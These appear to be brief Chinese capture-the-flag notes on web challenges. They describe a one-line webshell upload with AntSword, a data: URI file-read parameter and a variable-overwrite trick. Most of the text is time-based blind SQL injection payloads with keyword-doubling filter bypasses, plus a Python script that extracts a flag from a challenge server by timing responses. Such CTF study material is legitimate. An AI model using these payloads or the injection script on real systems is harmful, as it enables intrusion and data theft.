文件上传
上传一句话木马
蚁剑连接
根目录flag
GET传参
?text=data:text/plain,welcome to the beijing&file=/flag&password=r
变量覆盖
将flag的值赋给a 再让flag=a 输出flag
?a=flag&flag=a
sql
时间盲注查询数据库
id=1'/**/anandd/**/if((ascii(substr((select/**/database()),1,1)))>1,sleep(3),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(2),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(3),1)#
?id=1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1))),{},sleep(3),1)#
import requests
import time
url = "http://43.143.155.90:9801/index.php"
flag = ""
for i in range(1, 50):
for j in range(96, 127):
a = ("1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1)))={}"
",sleep(3),1)#").format(i, j)
data = {'id': a}
print(data)
start_time = time.time()
r = requests.post(url=url, data=data)
end_time = time.time()
sec = end_time - start_time
time.sleep(1)
if sec >= 2:
flag = flag + chr(j)
print(flag)
break